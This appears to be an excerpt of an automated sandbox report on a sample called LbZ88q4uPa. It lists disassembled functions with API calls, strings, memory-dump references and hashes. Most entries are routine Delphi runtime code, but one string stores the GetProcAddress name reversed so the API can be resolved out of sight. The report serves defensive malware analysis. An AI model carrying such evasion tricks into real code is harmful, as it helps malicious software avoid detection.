                      • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                      • Instruction ID: ff9c3d2e3e44a42bb9de128c1f10a1b86be38f817ec17dedad1256c0dd13b7aa
                      • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                      • Instruction Fuzzy Hash: 0CD05EAE30E2742AA224915A2D84D7B5AFCCAC57A1F00413EFA88C6201E2108C0596F1
                      Function 0285918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: LocalTime
                      • String ID:
                      • API String ID: 481472006-0
                      • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                      • Instruction ID: 372ca941af9c4dee0b87a5b11e0a1578b61918e2114cd93e6fa74046573cc6d0
                      • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                      • Instruction Fuzzy Hash: 77A01108808830028A803B2C0C0223A30C8A800A20FC80F80ACF8802E2FE2E022080E3
                      Function 0287E59A Relevance: .2, Instructions: 228COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cdec562d7fc803ffdd465c00ed372d1a905f5e2b60d7a7edb4b9137acafa7d7d
                      • Instruction ID: d243ca70814d8cfc31192da525124820162af206e19698ca1d05d8563ae2e772
                      • Opcode Fuzzy Hash: cdec562d7fc803ffdd465c00ed372d1a905f5e2b60d7a7edb4b9137acafa7d7d
                      • Instruction Fuzzy Hash: 6B51073A09D3C29FCB438FB884652927FF1EE4322470905EAD894CF063E359989BDB51
                      Function 028520C4 Relevance: .1, Instructions: 94COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                      • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                      • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                      • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                      Function 0285D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0285D21D
                        • Part of subcall function 0285D1E8: GetProcAddress.KERNEL32(00000000), ref: 0285D201
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                      • API String ID: 1646373207-1918263038
                      • Opcode ID: eef54a734f87b552337951117e795fd67c5dd7ae8c84bb20c28a4483c50798bb
                      • Instruction ID: e27b796843284e191fc50db9b6b3714e81cdd35a4d0f51f1e4bf5fdf19803f46
                      • Opcode Fuzzy Hash: eef54a734f87b552337951117e795fd67c5dd7ae8c84bb20c28a4483c50798bb
                      • Instruction Fuzzy Hash: D0419A6DEC42285B56096B6D7400427FFDED6887143A0851FFE04CB788DEA0BD998E6B
                      Function 02866E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02866E5E
                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02866E6F
                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02866E7F
                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02866E8F
                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02866E9F
                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02866EAF
                      • GetProcAddress.KERNEL32 ref: 02866EBF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                      • API String ID: 667068680-2233174745
                      • Opcode ID: 4f4600a69f0f431d600918d2e5f600fec5ad617dc408852b3feaa64d147751c4
                      • Instruction ID: 8876f638092018c41ca13f164922829d42a7c0f30761bcf5f97a2739b08ef3e8
                      • Opcode Fuzzy Hash: 4f4600a69f0f431d600918d2e5f600fec5ad617dc408852b3feaa64d147751c4
                      • Instruction Fuzzy Hash: E2F0A2ACA843B16EB3007FB49CC98376BDDAD107493501865A812D5A43FB7DC4244F51
                      Function 02852530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                      Download Yara Rule
                      APIs
                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028528CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Message
                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                      • API String ID: 2030045667-32948583
                      • Opcode ID: 6e6c51429d0e3b23eda0efba0857255854cb0f1304609c5b4460d301a8caf706
                      • Instruction ID: de5bec58c3a2cf9ef89e7527131f44bf815915afae15d82c43b1fb19537cc365
                      • Opcode Fuzzy Hash: 6e6c51429d0e3b23eda0efba0857255854cb0f1304609c5b4460d301a8caf706
                      • Instruction Fuzzy Hash: 2FA1F63CA042788BDF219A2CCC80B99BAE5EB09354F1441E5DD4DEB38ACF759989CF51
                      Function 0285252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                      Download Yara Rule
                      Strings
                      • bytes: , xrefs: 0285275D
                      • The unexpected small block leaks are:, xrefs: 02852707
                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02852849
                      • An unexpected memory leak has occurred. , xrefs: 02852690
                      • , xrefs: 02852814
                      • Unexpected Memory Leak, xrefs: 028528C0
                      • 7, xrefs: 028526A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                      • API String ID: 0-2723507874
                      • Opcode ID: 477a71b5fa468f5471eca522454386a49107ee475396147d31c71e94576c9ece
                      • Instruction ID: beece80ca64c579fcc377ee924e85b740bf39fb3ffcedbd4d1fa498038c11a76
                      • Opcode Fuzzy Hash: 477a71b5fa468f5471eca522454386a49107ee475396147d31c71e94576c9ece
                      • Instruction Fuzzy Hash: AE71B23CA042B88BDB219A2CCC84B99BAE5EB09354F1041E5DD4DEB28ADF754985CF52
                      Function 0285BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(00000000,0285C00B,?,?,00000000,00000000), ref: 0285BD76
                        • Part of subcall function 0285A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A762
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Locale$InfoThread
                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                      • API String ID: 4232894706-2493093252
                      • Opcode ID: 61928cfbe4dc3d7b8f6363963fdb72a4d2d94cd028c5f7e2e5fc2e4d1d1b023d
                      • Instruction ID: 67eca37a45ab25e39a3d1367f0b2a4c18d78ef2ab12736c320769a69262ed3e4
                      • Opcode Fuzzy Hash: 61928cfbe4dc3d7b8f6363963fdb72a4d2d94cd028c5f7e2e5fc2e4d1d1b023d
                      • Instruction Fuzzy Hash: 2A61733C7002689BDB05EBA8D890ADF77B7EF48300F109439AA05DB745DA79D9099F52
                      Function 0286AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                      Download Yara Rule
                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 0286AE38
                      • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0286AE4F
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 0286AEE3
                      • IsBadReadPtr.KERNEL32(?,00000002), ref: 0286AEEF
                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 0286AF03
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Read$HandleModule
                      • String ID: KernelBase$LoadLibraryExA
                      • API String ID: 2226866862-113032527
                      • Opcode ID: fdaa101a929ff03e0f3ec48a16e8aba3a1e44073ef8e582b862a7f80310d1a16
                      • Instruction ID: 833c743ddaef98da322f72d8458241794b777d87911041a281a4754814001fd9
                      • Opcode Fuzzy Hash: fdaa101a929ff03e0f3ec48a16e8aba3a1e44073ef8e582b862a7f80310d1a16
                      • Instruction Fuzzy Hash: 1E3142BD640215BBDB24DFA8CC89F7A77A8AF04768F044510EA58EB281D774A940CBA1
                      Function 0285432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543F3,?,?,028B17C8,?,?,0287E7A8,0285655D,0287D30D), ref: 02854365
                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543F3,?,?,028B17C8,?,?,0287E7A8,0285655D,0287D30D), ref: 0285436B
                      • GetStdHandle.KERNEL32(000000F5,028543B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543F3,?,?,028B17C8), ref: 02854380
                      • WriteFile.KERNEL32(00000000,000000F5,028543B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543F3,?,?), ref: 02854386
                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028543A4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: FileHandleWrite$Message
                      • String ID: Error$Runtime error at 00000000
                      • API String ID: 1570097196-2970929446
                      • Opcode ID: cb4a6de110043c6d37003870bbcbb8cac5815b97353e4ce8eb5e614c89d27be3
                      • Instruction ID: ec6ab1a1bf9e0043411ac48c598929db516c4b40e7cf105730c4a8d5414a2a49
                      • Opcode Fuzzy Hash: cb4a6de110043c6d37003870bbcbb8cac5815b97353e4ce8eb5e614c89d27be3
                      • Instruction Fuzzy Hash: 30F0246CAC032478FB10EA74AC0AFD9231C1740F11F180A84BB38E44D0DBF490C88B67
                      Function 0285AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0285ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0285ACD9
                        • Part of subcall function 0285ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0285ACFD
                        • Part of subcall function 0285ACBC: GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 0285AD18
                        • Part of subcall function 0285ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0285ADAE
                      • CharToOemA.USER32(?,?), ref: 0285AE7B
                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0285AE98
                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0285AE9E
                      • GetStdHandle.KERNEL32(000000F4,0285AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0285AEB3
                      • WriteFile.KERNEL32(00000000,000000F4,0285AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0285AEB9
                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0285AEDB
                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0285AEF1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                      • String ID:
                      • API String ID: 185507032-0
                      • Opcode ID: db3d5c2803853a0ea39081264f27c8636d0adf95b7908fe1a6ede6fb1c9fb0d7
                      • Instruction ID: b03d52a2dd5b19bee909c0cb72afeea2bc8c849d0b8471f9c1c1a8f1ba84379b
                      • Opcode Fuzzy Hash: db3d5c2803853a0ea39081264f27c8636d0adf95b7908fe1a6ede6fb1c9fb0d7
                      • Instruction Fuzzy Hash: 1C115EBE5482247AE700EB98CC80F9B77EDAB44300F804A29BB54D60D0EF74E9448F67
                      Function 0285E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0285E5A5
                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0285E5C1
                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0285E5FA
                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0285E677
                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0285E690
                      • VariantCopy.OLEAUT32(?,00000000), ref: 0285E6C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                      • String ID:
                      • API String ID: 351091851-0
                      • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                      • Instruction ID: f1f5697cb8a6f928269971d4bac65ab27f33e59c7e0a98a3396c3bf6df503ed4
                      • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                      • Instruction Fuzzy Hash: 9D51C47D9006299BDB22DB68CC80BD9B3EDAB49304F4441D5EE09E7212DA30AF858F65
                      Function 02853568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0285358A
                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028535D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028535BD
                      • RegCloseKey.ADVAPI32(?,028535E0,00000000,?,00000004,00000000,028535D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028535D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                      • API String ID: 3677997916-4173385793
                      • Opcode ID: 472cfff9983561b6db0bf99d96e26898fd0360a1769b8bb1460d82af003a4a63
                      • Instruction ID: 1029235ecc1bdbc080848b30c5c1a58d3521b943d3a0c619934389ebefb35895
                      • Opcode Fuzzy Hash: 472cfff9983561b6db0bf99d96e26898fd0360a1769b8bb1460d82af003a4a63
                      • Instruction Fuzzy Hash: 8E01D87D940328BAFB11DB90CD06BBD77ECE708750F1005E5BE04D6680F674A610DB59
                      Function 028680C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02868148,?,?,00000000,00000000,?,02868061,00000000,KernelBASE,00000000,00000000,02868088), ref: 0286810D
                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02868113
                      • GetProcAddress.KERNEL32(?,?), ref: 02868125
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: Kernel32$sserddAcorPteG
                      • API String ID: 667068680-1372893251
                      • Opcode ID: 6f82197bf5a0713e12a7f1fc6f8120dbd02c0246e0a964db16b1893f479cc97c
                      • Instruction ID: 493f68d972594e846715537ae73431b2c4a2be42bbbac7644a04b1485cc25d5d
                      • Opcode Fuzzy Hash: 6f82197bf5a0713e12a7f1fc6f8120dbd02c0246e0a964db16b1893f479cc97c
                      • Instruction Fuzzy Hash: 7401A23CA40318AFE702EFA8D845EAEB7EEEB4C700F914864F904D7750D674A9048A61
                      Function 0285A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(?,00000000,0285AA67,?,?,00000000), ref: 0285A9E8
                        • Part of subcall function 0285A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A762
                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0285AA67,?,?,00000000), ref: 0285AA18
                      • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0285AA23
                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0285AA67,?,?,00000000), ref: 0285AA41
                      • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0285AA4C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Locale$InfoThread$CalendarEnum
                      • String ID:
                      • API String ID: 4102113445-0
                      • Opcode ID: 620111e80cfab9a5382dd3223842c565e7c358e13fbb08f30b547f5963e25615
                      • Instruction ID: 9d11845f6903cf2085f107fd5e2a9060d9a8193e6eb56b4a08ae75679ba80f21
                      • Opcode Fuzzy Hash: 620111e80cfab9a5382dd3223842c565e7c358e13fbb08f30b547f5963e25615
                      • Instruction Fuzzy Hash: CC01F73C6402746BF706AA688D52B6E739DDB46710FD10220FE11E6780F5689E104A66
                      Function 0285AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetThreadLocale.KERNEL32(?,00000000,0285AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0285AAAF
